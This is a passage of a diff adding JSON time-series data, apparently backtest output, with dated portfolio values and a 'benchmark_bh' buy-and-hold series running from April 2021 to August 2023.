+ "2026-04-06", + 12110.258415817028 + ], + [ + "2026-04-07", + 12127.650287573058 + ], + [ + "2026-04-08", + 12175.648490342524 + ], + [ + "2026-04-09", + 12177.076739128785 + ], + [ + "2026-04-10", + 12178.505155453931 + ], + [ + "2026-04-13", + 12176.943739337617 + ], + [ + "2026-04-14", + 12240.509687353746 + ], + [ + "2026-04-15", + 12264.739493976575 + ], + [ + "2026-04-16", + 12266.17819346843 + ], + [ + "2026-04-17", + 12267.61706172508 + ], + [ + "2026-04-20", + 12269.056098766318 + ], + [ + "2026-04-21", + 12270.495304611946 + ], + [ + "2026-04-22", + 12271.934679281765 + ], + [ + "2026-04-23", + 12273.374222795579 + ] + ], + "benchmark_bh": [ + [ + "2021-04-26", + 10000.0 + ], + [ + "2021-04-27", + 9956.67699757896 + ], + [ + "2021-04-28", + 9923.015694830945 + ], + [ + "2021-04-29", + 9958.726058504279 + ], + [ + "2021-04-30", + 9893.452513933567 + ], + [ + "2021-05-03", + 9840.760534828834 + ], + [ + "2021-05-04", + 9663.668649358637 + ], + [ + "2021-05-05", + 9631.177318055403 + ], + [ + "2021-05-06", + 9703.772619409578 + ], + [ + "2021-05-07", + 9782.510500976987 + ], + [ + "2021-05-10", + 9535.461503106775 + ], + [ + "2021-05-11", + 9522.288968586865 + ], + [ + "2021-05-12", + 9275.820814132592 + ], + [ + "2021-05-13", + 9347.537026006228 + ], + [ + "2021-05-14", + 9553.900289897016 + ], + [ + "2021-05-17", + 9495.942979034498 + ], + [ + "2021-05-18", + 9431.839405908568 + ], + [ + "2021-05-19", + 9442.670156513828 + ], + [ + "2021-05-20", + 9625.323778781321 + ], + [ + "2021-05-21", + 9572.050035748105 + ], + [ + "2021-05-24", + 9733.041236292533 + ], + [ + "2021-05-25", + 9746.506493801775 + ], + [ + "2021-05-26", + 9780.463281076756 + ], + [ + "2021-05-27", + 9743.873827922882 + ], + [ + "2021-05-28", + 9774.60882129013 + ], + [ + "2021-06-01", + 9742.118410499439 + ], + [ + "2021-06-02", + 9761.141722755798 + ], + [ + "2021-06-03", + 9659.572368533089 + ], + [ + "2021-06-04", + 9823.491719483376 + ], + [ + "2021-06-07", + 9852.764938929055 + ], + [ + "2021-06-08", + 9857.446665733267 + ], + [ + "2021-06-09", + 9859.787529135372 + ], + [ + "2021-06-10", + 9962.530536853043 + ], + [ + "2021-06-11", + 9988.582882903533 + ], + [ + "2021-06-14", + 10084.300538877249 + ], + [ + "2021-06-15", + 10018.439707302785 + ], + [ + "2021-06-16", + 9981.85025414891 + ], + [ + "2021-06-17", + 10108.593785454115 + ], + [ + "2021-06-18", + 10029.268616882955 + ], + [ + "2021-06-21", + 10091.602964897267 + ], + [ + "2021-06-22", + 10185.670141877677 + ], + [ + "2021-06-23", + 10190.652876284126 + ], + [ + "2021-06-24", + 10253.661039481427 + ], + [ + "2021-06-25", + 10241.057381714369 + ], + [ + "2021-06-28", + 10365.608252137223 + ], + [ + "2021-06-29", + 10403.118217836163 + ], + [ + "2021-06-30", + 10386.706399670162 + ], + [ + "2021-07-01", + 10390.809124083526 + ], + [ + "2021-07-02", + 10510.083616598056 + ], + [ + "2021-07-06", + 10555.506308134394 + ], + [ + "2021-07-07", + 10577.779029674839 + ], + [ + "2021-07-08", + 10513.891776997 + ], + [ + "2021-07-09", + 10579.535367610828 + ], + [ + "2021-07-12", + 10620.856255246346 + ], + [ + "2021-07-13", + 10620.856255246346 + ], + [ + "2021-07-14", + 10639.907182879057 + ], + [ + "2021-07-15", + 10565.176292420325 + ], + [ + "2021-07-16", + 10479.604525718338 + ], + [ + "2021-07-19", + 10393.74187705211 + ], + [ + "2021-07-20", + 10514.479064000752 + ], + [ + "2021-07-21", + 10595.654462787497 + ], + [ + "2021-07-22", + 10665.695341829112 + ], + [ + "2021-07-23", + 10790.242530201787 + ], + [ + "2021-07-26", + 10798.740702017847 + ], + [ + "2021-07-27", + 10679.763535055374 + ], + [ + "2021-07-28", + 10720.787097138835 + ], + [ + "2021-07-29", + 10739.838024771545 + ], + [ + "2021-07-30", + 10683.864418443647 + ], + [ + "2021-08-02", + 10684.740746386551 + ], + [ + "2021-08-03", + 10749.50524751984 + ], + [ + "2021-08-04", + 10765.037976205303 + ], + [ + "2021-08-05", + 10833.323437823474 + ], + [ + "2021-08-06", + 10785.847082799091 + ], + [ + "2021-08-09", + 10805.774338374704 + ], + [ + "2021-08-10", + 10750.385257512924 + ], + [ + "2021-08-11", + 10731.923457909057 + ], + [ + "2021-08-12", + 10770.607997615505 + ], + [ + "2021-08-13", + 10808.411606816322 + ], + [ + "2021-08-16", + 10813.101618233439 + ], + [ + "2021-08-17", + 10717.856185195342 + ], + [ + "2021-08-18", + 10614.703549395117 + ], + [ + "2021-08-19", + 10665.988064818443 + ], + [ + "2021-08-20", + 10776.467980477402 + ], + [ + "2021-08-23", + 10937.648806606114 + ], + [ + "2021-08-24", + 10971.057888916781 + ], + [ + "2021-08-25", + 10983.656944121114 + ], + [ + "2021-08-26", + 10913.912470119012 + ], + [ + "2021-08-27", + 11019.99601786273 + ], + [ + "2021-08-30", + 11143.66503726741 + ], + [ + "2021-08-31", + 11134.580498960144 + ], + [ + "2021-09-01", + 11153.04045753892 + ], + [ + "2021-09-02", + 11147.767761680774 + ], + [ + "2021-09-03", + 11182.05593347198 + ], + [ + "2021-09-07", + 11197.881385146775 + ], + [ + "2021-09-08", + 11158.904122450997 + ], + [ + "2021-09-09", + 11120.515067271517 + ], + [ + "2021-09-10", + 11036.11327201431 + ], + [ + "2021-09-13", + 11028.495110191336 + ], + [ + "2021-09-14", + 10997.138770856167 + ], + [ + "2021-09-15", + 11078.900536134122 + ], + [ + "2021-09-16", + 11086.519618469642 + ], + [ + "2021-09-17", + 10955.230596216896 + ], + [ + "2021-09-20", + 10728.861833184164 + ], + [ + "2021-09-21", + 10742.062903592972 + ], + [ + "2021-09-22", + 10842.399691517836 + ], + [ + "2021-09-23", + 10942.439153890642 + ], + [ + "2021-09-24", + 10952.708391843413 + ], + [ + "2021-09-27", + 10865.281792363116 + ], + [ + "2021-09-28", + 10557.820476672694 + ], + [ + "2021-09-29", + 10540.51115877525 + ], + [ + "2021-09-30", + 10501.784275491731 + ], + [ + "2021-10-01", + 10566.915140617957 + ], + [ + "2021-10-04", + 10345.122245446753 + ], + [ + "2021-10-05", + 10484.76952160871 + ], + [ + "2021-10-06", + 10551.954970735525 + ], + [ + "2021-10-07", + 10648.768957150418 + ], + [ + "2021-10-08", + 10595.667349963129 + ], + [ + "2021-10-11", + 10514.399899921877 + ], + [ + "2021-10-12", + 10477.729441664036 + ], + [ + "2021-10-13", + 10561.634160146907 + ], + [ + "2021-10-14", + 10756.143983994863 + ], + [ + "2021-10-15", + 10823.915799612887 + ], + [ + "2021-10-18", + 10932.759043966716 + ], + [ + "2021-10-19", + 11015.491949979716 + ], + [ + "2021-10-20", + 11001.116305563402 + ], + [ + "2021-10-21", + 11068.300834177673 + ], + [ + "2021-10-22", + 10975.300531236995 + ], + [ + "2021-10-25", + 11087.66197453807 + ], + [ + "2021-10-26", + 11122.574253834833 + ], + [ + "2021-10-27", + 11148.391869186331 + ], + [ + "2021-10-28", + 11272.198044960225 + ], + [ + "2021-10-29", + 11327.646959137435 + ], + [ + "2021-11-01", + 11366.372001395865 + ], + [ + "2021-11-02", + 11413.899905122771 + ], + [ + "2021-11-03", + 11535.06513040487 + ], + [ + "2021-11-04", + 11682.92614000646 + ], + [ + "2021-11-05", + 11694.076308464859 + ], + [ + "2021-11-08", + 11678.233367051707 + ], + [ + "2021-11-09", + 11597.84960905372 + ], + [ + "2021-11-10", + 11427.396460058546 + ], + [ + "2021-11-11", + 11459.080501859757 + ], + [ + "2021-11-12", + 11579.657519625558 + ], + [ + "2021-11-15", + 11577.01841015885 + ], + [ + "2021-11-16", + 11659.456752157428 + ], + [ + "2021-11-17", + 11665.617742621562 + ], + [ + "2021-11-18", + 11786.49024491433 + ], + [ + "2021-11-19", + 11852.207476531763 + ], + [ + "2021-11-22", + 11714.613863857852 + ], + [ + "2021-11-23", + 11661.218613168687 + ], + [ + "2021-11-24", + 11698.7709224447 + ], + [ + "2021-11-26", + 11476.977106760953 + ], + [ + "2021-11-29", + 11726.05491428049 + ], + [ + "2021-11-30", + 11553.840824786605 + ], + [ + "2021-12-01", + 11357.278257963148 + ], + [ + "2021-12-02", + 11439.129312957972 + ], + [ + "2021-12-03", + 11240.219439144594 + ], + [ + "2021-12-06", + 11330.287909629233 + ], + [ + "2021-12-07", + 11671.486010096365 + ], + [ + "2021-12-08", + 11723.705766265479 + ], + [ + "2021-12-09", + 11551.200794807351 + ], + [ + "2021-12-10", + 11676.766990567416 + ], + [ + "2021-12-13", + 11508.076623096047 + ], + [ + "2021-12-14", + 11388.964140789449 + ], + [ + "2021-12-15", + 11648.602068225997 + ], + [ + "2021-12-16", + 11349.064524523514 + ], + [ + "2021-12-17", + 11292.440115826252 + ], + [ + "2021-12-20", + 11182.901884500898 + ], + [ + "2021-12-21", + 11433.180040379204 + ], + [ + "2021-12-22", + 11572.416767946059 + ], + [ + "2021-12-23", + 11659.661105942434 + ], + [ + "2021-12-27", + 11852.363963664424 + ], + [ + "2021-12-28", + 11797.429615999907 + ], + [ + "2021-12-29", + 11795.668675501194 + ], + [ + "2021-12-30", + 11760.418568100393 + ], + [ + "2021-12-31", + 11686.980077254935 + ], + [ + "2022-01-03", + 11799.488802563223 + ], + [ + "2022-01-04", + 11646.443466307814 + ], + [ + "2022-01-05", + 11288.652206703302 + ], + [ + "2022-01-06", + 11280.719229589913 + ], + [ + "2022-01-07", + 11158.519348207159 + ], + [ + "2022-01-10", + 11165.86227677916 + ], + [ + "2022-01-11", + 11333.596231716205 + ], + [ + "2022-01-12", + 11378.539336216563 + ], + [ + "2022-01-13", + 11093.892923955631 + ], + [ + "2022-01-14", + 11162.92676227294 + ], + [ + "2022-01-18", + 10885.034150555166 + ], + [ + "2022-01-19", + 10765.4770606893 + ], + [ + "2022-01-20", + 10625.648443555965 + ], + [ + "2022-01-21", + 10331.014470181055 + ], + [ + "2022-01-24", + 10378.30948423406 + ], + [ + "2022-01-25", + 10137.72432545531 + ], + [ + "2022-01-26", + 10121.863894303804 + ], + [ + "2022-01-27", + 10019.929096600703 + ], + [ + "2022-01-28", + 10334.24546921424 + ], + [ + "2022-01-31", + 10664.71775750625 + ], + [ + "2022-02-01", + 10737.276238358623 + ], + [ + "2022-02-02", + 10824.519655842452 + ], + [ + "2022-02-03", + 10385.651492293515 + ], + [ + "2022-02-04", + 10516.668042832922 + ], + [ + "2022-02-07", + 10432.064655328346 + ], + [ + "2022-02-08", + 10549.275358716835 + ], + [ + "2022-02-09", + 10772.819989261301 + ], + [ + "2022-02-10", + 10529.003831449367 + ], + [ + "2022-02-11", + 10195.00782113484 + ], + [ + "2022-02-14", + 10207.639094278251 + ], + [ + "2022-02-15", + 10461.441892691619 + ], + [ + "2022-02-16", + 10458.79910117473 + ], + [ + "2022-02-17", + 10147.712807081834 + ], + [ + "2022-02-18", + 10031.974923765452 + ], + [ + "2022-02-22", + 9931.216541094947 + ], + [ + "2022-02-23", + 9676.826455677827 + ], + [ + "2022-02-24", + 10002.009478885882 + ], + [ + "2022-02-25", + 10157.11308119206 + ], + [ + "2022-02-28", + 10187.367567010782 + ], + [ + "2022-03-01", + 10031.385795736609 + ], + [ + "2022-03-02", + 10199.707958189952 + ], + [ + "2022-03-03", + 10054.005550506545 + ], + [ + "2022-03-04", + 9908.30222231059 + ], + [ + "2022-03-07", + 9542.873470119657 + ], + [ + "2022-03-08", + 9498.518573135596 + ], + [ + "2022-03-09", + 9840.446640050966 + ], + [ + "2022-03-10", + 9731.169834288412 + ], + [ + "2022-03-11", + 9529.361266470616 + ], + [ + "2022-03-14", + 9346.354167385816 + ], + [ + "2022-03-15", + 9639.519002738802 + ], + [ + "2022-03-16", + 9997.016618841437 + ], + [ + "2022-03-17", + 10118.04284672923 + ], + [ + "2022-03-18", + 10325.139759118436 + ], + [ + "2022-03-21", + 10296.432654887973 + ], + [ + "2022-03-22", + 10498.787086644992 + ], + [ + "2022-03-23", + 10347.904954870492 + ], + [ + "2022-03-24", + 10577.906060406058 + ], + [ + "2022-03-25", + 10569.0811066365 + ], + [ + "2022-03-28", + 10732.610160267677 + ], + [ + "2022-03-29", + 10917.31468448558 + ], + [ + "2022-03-30", + 10796.725700056695 + ], + [ + "2022-03-31", + 10662.904347792468 + ], + [ + "2022-04-01", + 10642.610728223917 + ], + [ + "2022-04-04", + 10861.72769342661 + ], + [ + "2022-04-05", + 10620.551565593929 + ], + [ + "2022-04-06", + 10389.9650140797 + ], + [ + "2022-04-07", + 10414.670650276757 + ], + [ + "2022-04-08", + 10269.082386148937 + ], + [ + "2022-04-11", + 10026.140715254816 + ], + [ + "2022-04-12", + 9983.790694593912 + ], + [ + "2022-04-13", + 10186.72965181705 + ], + [ + "2022-04-14", + 9953.78658818745 + ], + [ + "2022-04-18", + 9961.436047436957 + ], + [ + "2022-04-19", + 10184.081337224892 + ], + [ + "2022-04-20", + 10035.553876540673 + ], + [ + "2022-04-21", + 9827.906497649517 + ], + [ + "2022-04-22", + 9570.555123374916 + ], + [ + "2022-04-25", + 9693.496017356449 + ], + [ + "2022-04-26", + 9327.613452480795 + ], + [ + "2022-04-27", + 9316.43843018368 + ], + [ + "2022-04-28", + 9647.318505533154 + ], + [ + "2022-04-29", + 9213.203868766945 + ], + [ + "2022-05-02", + 9367.025197097844 + ], + [ + "2022-05-03", + 9377.0265659 + ], + [ + "2022-05-04", + 9694.085145385292 + ], + [ + "2022-05-05", + 9205.850814556949 + ], + [ + "2022-05-06", + 9095.55592191955 + ], + [ + "2022-05-09", + 8739.67472584605 + ], + [ + "2022-05-10", + 8845.852165869364 + ], + [ + "2022-05-11", + 8583.500567449959 + ], + [ + "2022-05-12", + 8563.204186343773 + ], + [ + "2022-05-13", + 8880.555488818396 + ], + [ + "2022-05-16", + 8777.615491416082 + ], + [ + "2022-05-17", + 9004.969202872036 + ], + [ + "2022-05-18", + 8562.912383866988 + ], + [ + "2022-05-19", + 8517.02851554557 + ], + [ + "2022-05-20", + 8490.557336287075 + ], + [ + "2022-05-23", + 8631.733583786387 + ], + [ + "2022-05-24", + 8448.20547460108 + ], + [ + "2022-05-25", + 8566.440708452228 + ], + [ + "2022-05-26", + 8803.792106660158 + ], + [ + "2022-05-27", + 9091.145746316131 + ], + [ + "2022-05-31", + 9067.027397122827 + ], + [ + "2022-06-01", + 8999.968978727231 + ], + [ + "2022-06-02", + 9246.438974206594 + ], + [ + "2022-06-03", + 9005.85105389021 + ], + [ + "2022-06-06", + 9035.85055773395 + ], + [ + "2022-06-07", + 9113.792195949874 + ], + [ + "2022-06-08", + 9048.203836088749 + ], + [ + "2022-06-09", + 8805.852213736018 + ], + [ + "2022-06-10", + 8495.262996417458 + ], + [ + "2022-06-13", + 8100.265540253876 + ], + [ + "2022-06-14", + 8114.971648673868 + ], + [ + "2022-06-15", + 8317.618803420219 + ], + [ + "2022-06-16", + 7982.031226915271 + ], + [ + "2022-06-17", + 8079.089149154606 + ], + [ + "2022-06-21", + 8282.921003546458 + ], + [ + "2022-06-22", + 8270.839276392453 + ], + [ + "2022-06-23", + 8394.016742098067 + ], + [ + "2022-06-24", + 8681.625363729027 + ], + [ + "2022-06-27", + 8617.973762262724 + ], + [ + "2022-06-28", + 8355.413207495587 + ], + [ + "2022-06-29", + 8363.073712895635 + ], + [ + "2022-06-30", + 8259.34851829238 + ], + [ + "2022-07-01", + 8313.863112236346 + ], + [ + "2022-07-05", + 8456.196444004807 + ], + [ + "2022-07-06", + 8510.415553421808 + ], + [ + "2022-07-07", + 8692.529755337891 + ], + [ + "2022-07-08", + 8703.433226434212 + ], + [ + "2022-07-11", + 8517.48785130556 + ], + [ + "2022-07-12", + 8434.97678881592 + ], + [ + "2022-07-13", + 8417.589227352146 + ], + [ + "2022-07-14", + 8447.64764399877 + ], + [ + "2022-07-15", + 8600.882605838462 + ], + [ + "2022-07-18", + 8528.094917362367 + ], + [ + "2022-07-19", + 8790.363669652717 + ], + [ + "2022-07-20", + 8929.746758714238 + ], + [ + "2022-07-21", + 9057.93733574029 + ], + [ + "2022-07-22", + 8899.101055063864 + ], + [ + "2022-07-25", + 8848.415793307377 + ], + [ + "2022-07-26", + 8674.553065845275 + ], + [ + "2022-07-27", + 9041.137981792814 + ], + [ + "2022-07-28", + 9129.541245083428 + ], + [ + "2022-07-29", + 9296.037110647358 + ], + [ + "2022-08-01", + 9290.437632835714 + ], + [ + "2022-08-02", + 9262.739410354643 + ], + [ + "2022-08-03", + 9514.987463079393 + ], + [ + "2022-08-04", + 9559.481357457758 + ], + [ + "2022-08-05", + 9481.392437234623 + ], + [ + "2022-08-08", + 9450.746733584247 + ], + [ + "2022-08-09", + 9343.776732259628 + ], + [ + "2022-08-10", + 9604.568061915146 + ], + [ + "2022-08-11", + 9550.054388483726 + ], + [ + "2022-08-12", + 9735.999763612379 + ], + [ + "2022-08-15", + 9814.678732376902 + ], + [ + "2022-08-16", + 9791.691693101486 + ], + [ + "2022-08-17", + 9680.009588058669 + ], + [ + "2022-08-18", + 9703.288429810873 + ], + [ + "2022-08-19", + 9514.101009498492 + ], + [ + "2022-08-22", + 9263.621261372817 + ], + [ + "2022-08-23", + 9255.962596997859 + ], + [ + "2022-08-24", + 9282.778968460754 + ], + [ + "2022-08-25", + 9446.913719346587 + ], + [ + "2022-08-26", + 9059.702878801729 + ], + [ + "2022-08-29", + 8970.41224141767 + ], + [ + "2022-08-30", + 8870.516379001894 + ], + [ + "2022-08-31", + 8818.946504689597 + ], + [ + "2022-09-01", + 8822.778598414712 + ], + [ + "2022-09-02", + 8698.13015366208 + ], + [ + "2022-09-06", + 8635.653126203282 + ], + [ + "2022-09-07", + 8810.105902206773 + ], + [ + "2022-09-08", + 8855.782655205549 + ], + [ + "2022-09-09", + 9049.390376759342 + ], + [ + "2022-09-12", + 9156.946744575167 + ], + [ + "2022-09-13", + 8654.809912778675 + ], + [ + "2022-09-14", + 8723.470943515233 + ], + [ + "2022-09-15", + 8578.192892115101 + ], + [ + "2022-09-16", + 8525.738405246995 + ], + [ + "2022-09-19", + 8592.134054610144 + ], + [ + "2022-09-20", + 8523.643318694423 + ], + [ + "2022-09-21", + 8371.017736159565 + ], + [ + "2022-09-22", + 8267.989369552924 + ], + [ + "2022-09-23", + 8133.3736149623055 + ], + [ + "2022-09-26", + 8099.718755802106 + ], + [ + "2022-09-27", + 8102.965403548557 + ], + [ + "2022-09-28", + 8264.15175275254 + ], + [ + "2022-09-29", + 8025.915741988802 + ], + [ + "2022-09-30", + 7889.823485275895 + ], + [ + "2022-10-03", + 8074.922909375632 + ], + [ + "2022-10-04", + 8328.80395135533 + ], + [ + "2022-10-05", + 8324.375365501013 + ], + [ + "2022-10-06", + 8258.839474854956 + ], + [ + "2022-10-07", + 7944.142930560308 + ], + [ + "2022-10-10", + 7864.73123380991 + ], + [ + "2022-10-11", + 7756.682391782474 + ], + [ + "2022-10-12", + 7754.027633602501 + ], + [ + "2022-10-13", + 7935.875807393059 + ], + [ + "2022-10-14", + 7697.346153127446 + ], + [ + "2022-10-17", + 7951.524520659201 + ], + [ + "2022-10-18", + 8014.403812100192 + ], + [ + "2022-10-19", + 7985.1766182817655 + ], + [ + "2022-10-20", + 7944.438415087274 + ], + [ + "2022-10-21", + 8130.716095244697 + ], + [ + "2022-10-24", + 8220.165060786507 + ], + [ + "2022-10-25", + 8390.206740674033 + ], + [ + "2022-10-26", + 8204.814593584966 + ], + [ + "2022-10-27", + 8055.437499821651 + ], + [ + "2022-10-28", + 8301.939713240092 + ], + [ + "2022-10-31", + 8205.4055626389 + ], + [ + "2022-11-01", + 8121.562518496549 + ], + [ + "2022-11-02", + 7843.182035129888 + ], + [ + "2022-11-03", + 7689.9659437973705 + ], + [ + "2022-11-04", + 7813.6584362719495 + ], + [ + "2022-11-07", + 7899.566190052886 + ], + [ + "2022-11-08", + 7957.13412410884 + ], + [ + "2022-11-09", + 7773.510281618846 + ], + [ + "2022-11-10", + 8347.1065022889 + ], + [ + "2022-11-11", + 8500.910340881444 + ], + [ + "2022-11-14", + 8426.519119551844 + ], + [ + "2022-11-15", + 8543.126887223314 + ], + [ + "2022-11-16", + 8426.519119551844 + ], + [ + "2022-11-17", + 8407.919243066217 + ], + [ + "2022-11-18", + 8408.216568618273 + ], + [ + "2022-11-21", + 8321.719686808494 + ], + [ + "2022-11-22", + 8441.575022738962 + ], + [ + "2022-11-23", + 8526.299917899487 + ], + [ + "2022-11-25", + 8470.211247503456 + ], + [ + "2022-11-28", + 8345.927325718669 + ], + [ + "2022-11-29", + 8282.749788213076 + ], + [ + "2022-11-30", + 8660.323782923628 + ], + [ + "2022-12-01", + 8670.953861794062 + ], + [ + "2022-12-02", + 8636.413469565508 + ], + [ + "2022-12-05", + 8491.465882169055 + ], + [ + "2022-12-06", + 8315.519114304921 + ], + [ + "2022-12-07", + 8281.57153215539 + ], + [ + "2022-12-08", + 8379.580343853779 + ], + [ + "2022-12-09", + 8326.145511125176 + ], + [ + "2022-12-12", + 8430.650379854103 + ], + [ + "2022-12-13", + 8521.28128350378 + ], + [ + "2022-12-14", + 8458.105587023278 + ], + [ + "2022-12-15", + 8174.112738669342 + ], + [ + "2022-12-16", + 8096.177544041232 + ], + [ + "2022-12-19", + 7982.395749883118 + ], + [ + "2022-12-20", + 7976.182290203915 + ], + [ + "2022-12-21", + 8091.885194043584 + ], + [ + "2022-12-22", + 7893.917004563809 + ], + [ + "2022-12-23", + 7911.671850533065 + ], + [ + "2022-12-27", + 7799.813007081595 + ], + [ + "2022-12-28", + 7696.835268664934 + ], + [ + "2022-12-29", + 7884.447692012704 + ], + [ + "2022-12-30", + 7879.713495993423 + ], + [ + "2023-01-03", + 7826.448037573113 + ], + [ + "2023-01-04", + 7863.732477698512 + ], + [ + "2023-01-05", + 7740.630494021593 + ], + [ + "2023-01-06", + 7954.285137781858 + ], + [ + "2023-01-09", + 8005.774006990188 + ], + [ + "2023-01-10", + 8073.540299532941 + ], + [ + "2023-01-11", + 8213.212429533614 + ], + [ + "2023-01-12", + 8257.600464969297 + ], + [ + "2023-01-13", + 8314.417260788476 + ], + [ + "2023-01-17", + 8331.285653176832 + ], + [ + "2023-01-18", + 8222.978147124231 + ], + [ + "2023-01-19", + 8142.192125144049 + ], + [ + "2023-01-20", + 8365.017835390818 + ], + [ + "2023-01-23", + 8550.854590039153 + ], + [ + "2023-01-24", + 8533.395228596864 + ], + [ + "2023-01-25", + 8514.458444519742 + ], + [ + "2023-01-26", + 8680.468279459876 + ], + [ + "2023-01-27", + 8766.877712577874 + ], + [ + "2023-01-30", + 8589.620134849565 + ], + [ + "2023-01-31", + 8718.344609151754 + ], + [ + "2023-02-01", + 8904.773253366568 + ], + [ + "2023-02-02", + 9224.36600388843 + ], + [ + "2023-02-03", + 9060.42456063706 + ], + [ + "2023-02-06", + 8983.783606647316 + ], + [ + "2023-02-07", + 9169.916766335162 + ], + [ + "2023-02-08", + 9006.86453820233 + ], + [ + "2023-02-09", + 8927.265977405283 + ], + [ + "2023-02-10", + 8868.671671861579 + ], + [ + "2023-02-13", + 9010.71228064071 + ], + [ + "2023-02-14", + 9077.293873537961 + ], + [ + "2023-02-15", + 9146.837675805238 + ], + [ + "2023-02-16", + 8975.203509214745 + ], + [ + "2023-02-17", + 8911.875928164305 + ], + [ + "2023-02-21", + 8700.88616822201 + ], + [ + "2023-02-22", + 8707.39695345327 + ], + [ + "2023-02-23", + 8783.449699926718 + ], + [ + "2023-02-24", + 8636.37572855116 + ], + [ + "2023-02-27", + 8698.223125429131 + ], + [ + "2023-02-28", + 8686.977223666046 + ], + [ + "2023-03-01", + 8617.140698409437 + ], + [ + "2023-03-02", + 8688.458328351058 + ], + [ + "2023-03-03", + 8868.0797822951 + ], + [ + "2023-03-06", + 8878.14190492523 + ], + [ + "2023-03-07", + 8769.242509306152 + ], + [ + "2023-03-08", + 8813.0395756879 + ], + [ + "2023-03-09", + 8660.343113687073 + ], + [ + "2023-03-10", + 8538.721314182621 + ], + [ + "2023-03-13", + 8602.049815745606 + ], + [ + "2023-03-14", + 8799.722520698415 + ], + [ + "2023-03-15", + 8845.886224833532 + ], + [ + "2023-03-16", + 9079.070462749942 + ], + [ + "2023-03-17", + 9036.162611486727 + ], + [ + "2023-03-20", + 9068.229586506684 + ], + [ + "2023-03-21", + 9197.745701597632 + ], + [ + "2023-03-22", + 9072.67566209936 + ], + [ + "2023-03-23", + 9180.257804266446 + ], + [ + "2023-03-24", + 9214.048899283316 + ], + [ + "2023-03-27", + 9150.918307917522 + ], + [ + "2023-03-28", + 9102.311563487796 + ], + [ + "2023-03-29", + 9268.282736901037 + ], + [ + "2023-03-30", + 9356.011264496117 + ], + [ + "2023-03-31", + 9511.609182038996 + ], + [ + "2023-04-03", + 9488.490509469635 + ], + [ + "2023-04-04", + 9456.483367765106 + ], + [ + "2023-04-05", + 9363.12406493185 + ], + [ + "2023-04-06", + 9426.25005373492 + ], + [ + "2023-04-10", + 9420.916604048802 + ], + [ + "2023-04-11", + 9360.4554990637 + ], + [ + "2023-04-12", + 9277.766777652865 + ], + [ + "2023-04-13", + 9459.446497647676 + ], + [ + "2023-04-14", + 9441.664036302069 + ], + [ + "2023-04-17", + 9449.665131343792 + ], + [ + "2023-04-18", + 9450.25702091027 + ], + [ + "2023-04-19", + 9445.812786342687 + ], + [ + "2023-04-20", + 9373.794646354268 + ], + [ + "2023-04-21", + 9383.572330607973 + ], + [ + "2023-04-24", + 9364.01235953784 + ], + [ + "2023-04-25", + 9187.373366239815 + ], + [ + "2023-04-26", + 9243.089229055095 + ], + [ + "2023-04-27", + 9494.419530772413 + ], + [ + "2023-04-28", + 9559.91768040412 + ], + [ + "2023-05-01", + 9548.95069394219 + ], + [ + "2023-05-02", + 9465.670082964874 + ], + [ + "2023-05-03", + 9403.727873294762 + ], + [ + "2023-05-04", + 9370.533270407095 + ], + [ + "2023-05-05", + 9569.698126195459 + ], + [ + "2023-05-08", + 9593.409608843842 + ], + [ + "2023-05-09", + 9532.652098819231 + ], + [ + "2023-05-10", + 9636.382816497757 + ], + [ + "2023-05-11", + 9667.798989148354 + ], + [ + "2023-05-12", + 9633.123281575674 + ], + [ + "2023-05-15", + 9685.285965966994 + ], + [ + "2023-05-16", + 9696.25019089129 + ], + [ + "2023-05-17", + 9813.614619874805 + ], + [ + "2023-05-18", + 9995.888070461186 + ], + [ + "2023-05-19", + 9973.363128483392 + ], + [ + "2023-05-22", + 10006.852295385479 + ], + [ + "2023-05-23", + 9880.004746162682 + ], + [ + "2023-05-24", + 9829.323166456375 + ], + [ + "2023-05-25", + 10068.499941041171 + ], + [ + "2023-05-26", + 10325.75466149854 + ], + [ + "2023-05-30", + 10372.582975691197 + ], + [ + "2023-05-31", + 10313.600213853475 + ], + [ + "2023-06-01", + 10432.74675512424 + ], + [ + "2023-06-02", + 10510.987559917312 + ], + [ + "2023-06-05", + 10518.398606417648 + ], + [ + "2023-06-06", + 10516.622017205667 + ], + [ + "2023-06-07", + 10338.20183213294 + ], + [ + "2023-06-08", + 10466.53416809093 + ], + [ + "2023-06-09", + 10506.545166374819 + ], + [ + "2023-06-12", + 10684.072454278832 + ], + [ + "2023-06-13", + 10766.170206635736 + ], + [ + "2023-06-14", + 10844.413772966444 + ], + [ + "2023-06-15", + 10973.635324042969 + ], + [ + "2023-06-16", + 10904.577552399487 + ], + [ + "2023-06-20", + 10888.966580147693 + ], + [ + "2023-06-21", + 10740.574434807599 + ], + [ + "2023-06-22", + 10867.302317399537 + ], + [ + "2023-06-23", + 10759.571972712694 + ], + [ + "2023-06-26", + 10615.331338950853 + ], + [ + "2023-06-27", + 10797.853327924402 + ], + [ + "2023-06-28", + 10818.926621618624 + ], + [ + "2023-06-29", + 10797.260517845378 + ], + [ + "2023-06-30", + 10963.757303921853 + ], + [ + "2023-07-03", + 10989.576760298442 + ], + [ + "2023-07-05", + 10989.279434746384 + ], + [ + "2023-07-06", + 10905.587354661426 + ], + [ + "2023-07-07", + 10869.379914213754 + ], + [ + "2023-07-10", + 10872.940456738073 + ], + [ + "2023-07-11", + 10926.657886818011 + ], + [ + "2023-07-12", + 11064.662048087022 + ], + [ + "2023-07-13", + 11252.525771359597 + ], + [ + "2023-07-14", + 11250.149928480778 + ], + [ + "2023-07-17", + 11355.210786786925 + ], + [ + "2023-07-18", + 11448.107071810013 + ], + [ + "2023-07-19", + 11445.433903379137 + ], + [ + "2023-07-20", + 11181.596597711992 + ], + [ + "2023-07-21", + 11148.058643645016 + ], + [ + "2023-07-24", + 11165.865038316795 + ], + [ + "2023-07-25", + 11241.544056696945 + ], + [ + "2023-07-26", + 11204.150996091228 + ], + [ + "2023-07-27", + 11177.440483571014 + ], + [ + "2023-07-28", + 11381.032084188604 + ], + [ + "2023-07-31", + 11386.968469591742 + ], + [ + "2023-08-01", + 11360.555282623585 + ], + [ + "2023-08-02", + 11111.256552093231 + ], + [ + "2023-08-03", + 11093.450157421454 + ], + [ + "2023-08-04", + 11041.512998603674 + ], + [ + "2023-08-07", + 11135.002093705783 + ], + [ + "2023-08-08", + 11040.325537420538 + ], + [ + "2023-08-09", + 10918.943071177804 + ], + [ + "2023-08-10", + 10939.122547190766 + ], + [ + "2023-08-11", + 10869.379914213754 + ], + [ + "2023-08-14", + 10991.357031560601 + ], + [ + "2023-08-15", + 10874.72164851278 + ], + [ + "2023-08-16", + 10759.571972712694 + ], + [ + "2023-08-17", + 10642.042771983612 + ], + [ + "2023-08-18", + 10628.687975979778 + ], + [ + "2023-08-21", + 10799.930924738619 + ], + [ + "2023-08-22", 